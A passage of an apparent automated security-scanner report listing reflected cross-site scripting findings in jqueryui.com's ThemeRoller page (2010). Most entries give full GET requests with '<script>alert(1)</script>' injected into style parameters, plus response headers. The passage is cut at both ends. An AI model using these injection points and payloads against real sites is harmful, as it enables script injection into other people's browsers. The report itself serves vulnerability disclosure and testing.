GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.pnge0e2d"><script>alert(1)</script>60dbb8bd3af&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:53:59 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ea49"><script>alert(1)</script>bb88e881afa was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png3ea49"><script>alert(1)</script>bb88e881afa&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:54:03 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fad9e"><script>alert(1)</script>111ada64c2c was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCCfad9e"><script>alert(1)</script>111ada64c2c&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:53:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39bc0"><script>alert(1)</script>e24a25cb4c9 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC39bc0"><script>alert(1)</script>e24a25cb4c9&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:38 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ef13"><script>alert(1)</script>dcecacde3c4 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF3ef13"><script>alert(1)</script>dcecacde3c4&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:44 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c46a8"><script>alert(1)</script>1f7af90ed7f was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000c46a8"><script>alert(1)</script>1f7af90ed7f&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:53:54 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42f4a"><script>alert(1)</script>475d9e92991 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD42f4a"><script>alert(1)</script>475d9e92991&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:30 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8752b"><script>alert(1)</script>e220339ee07 was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D9368752b"><script>alert(1)</script>e220339ee07&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:53:47 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37cb2"><script>alert(1)</script>0fa604b9a9c was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF37cb2"><script>alert(1)</script>0fa604b9a9c&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:52 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e14f"><script>alert(1)</script>04d20544562 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px4e14f"><script>alert(1)</script>04d20544562&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d33e"><script>alert(1)</script>d4448f15dc2 was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*7d33e"><script>alert(1)</script>d4448f15dc2 HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:54:10 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38c39"><script>alert(1)</script>60cd583f00d was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC38c39"><script>alert(1)</script>60cd583f00d&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:53:34 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5dc0"><script>alert(1)</script>24ffebe8c1a was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666a5dc0"><script>alert(1)</script>24ffebe8c1a&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=